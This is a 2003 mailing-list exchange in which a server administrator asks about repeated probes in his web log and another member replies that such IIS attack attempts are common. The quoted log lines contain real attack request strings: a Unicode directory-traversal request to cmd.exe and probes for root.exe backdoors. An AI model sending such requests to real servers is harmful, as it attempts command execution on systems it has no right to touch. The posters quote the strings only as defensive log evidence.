[ale] Abuse
Christopher Fowler
cfowler at outpostsentinel.com
Tue May 13 20:08:46 EDT 2003
I get those all the time in my access_log. I never really looked
until ppl started posting them here. I was amazed at the number.
Most of these kiddies are trying to execute IIS bugs. I've not had
a beakin on my current web server.
On Tue, May 13, 2003 at 10:45:50AM -0400, Synban Administrator wrote:
> Hey guys,
>
> This is my first post to the list but I have been reading your messages
> for a while. Here is my first question for you guys:
> This guy has been running this script (or whatever he is running) for a
> few months now. It is an everyday occurance and he is starting to get on
> my nerves. I can do a reverse lookup on his IP and report him to his
> ISP, but I don't know if he is worth it. Here are two lines from my log:
> 24.98.237.56 - - [13/May/2003:10:35:25 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
> 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 283
> 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
> 24.98.237.56 - - [13/May/2003:10:35:24 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
>
> Yours,
> Emil P. Man
> admin at synban.com
>
>
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale
More information about the Ale
mailing list